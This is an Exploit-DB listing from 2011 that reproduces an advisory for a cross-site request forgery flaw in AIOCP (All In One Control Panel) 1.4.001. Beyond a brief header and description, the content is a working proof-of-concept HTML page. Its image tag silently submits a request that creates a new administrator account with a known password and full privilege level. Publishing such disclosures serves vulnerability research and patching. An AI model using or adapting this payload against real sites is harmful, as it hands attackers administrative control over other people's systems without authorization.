AIOCP 1.4.001 CSRF Vulnerability



EDB-ID: 16136 CVE: N/A OSVDB-ID: N/A
Author: AutoSec Tools Published: 2011-02-08 Verified: Not Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
Source: http://packetstormsecurity.org/files/view/98247/AIOCP-1.4.001-xsrf.txt

<!------------------------------------------------------------------------
# Software................AIOCP (All In One Control Panel) 1.4.001
# Vulnerability...........Cross-site Request Forgery
# Download................http://www.tecnick.com/public/code/cp_dpage.php?aiocp_dp=aiocp
# Release Date............2/2/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# ------------------------------------------------------------------------
# 
# --Description--
# 
# A cross-site request forgery vulnerability in AIOCP (All In One
# Control Panel) 1.4.001 can be exploited to create a new admin.
# 
# 
# --PoC-->
<html>
    <body>
        <img src="http://localhost/aiocp/admin/code/cp_edit_user.php?uemode=&user_agreed=I+AGREE&user_id=2&user_name=new_admin&user_email=x%40x.com&x_user_email=%5E%28%5Ba-zA-Z0-9_%5C.%5C-%5D%2B%29%40%28%28%5C%5B%5B0-9%5D%7B1%2C3%7D%5C.%5B0-9%5D%7B1%2C3%7D%5C.%5B0-9%5D%7B1%2C3%7D%5C.%29%7C%28%28%5Ba-zA-Z0-9%5C-%5D%2B%5C.%29%2B%29%29%28%5Ba-zA-Z%5D%7B2%2C4%7D%7C%5B0-9%5D%7B1%2C3%7D%29%28%5C%5D%3F%29%24&xl_user_email=email&newpassword=Password1&user_password=81dc9bdb52d04dc20036dbd8313ed055&newpassword_repeat=Password1&user_regdate=2002-10-13+08%3A38%3A31&user_ip=127.0.0.1&user_level=10&user_language=eng&user_firstname=&user_lastname=&user_birthdate=0000-00-00&x_user_birthdate=%28%5B0-9%5D%7B4%7D%29-%28%5B0-9%5D%7B1%2C2%7D%29-%28%5B0-9%5D%7B1%2C2%7D%29&xl_user_birthdate=birth+date&user_birthplace=&user_piva=&user_fc=&MAX_FILE_SIZE=500000&user_photo=_blank.png&user_signature=&user_notes=&menu_mode=add&ff_required=user_name&ff_required_labels=name&adm=1" />
    </body>
</html>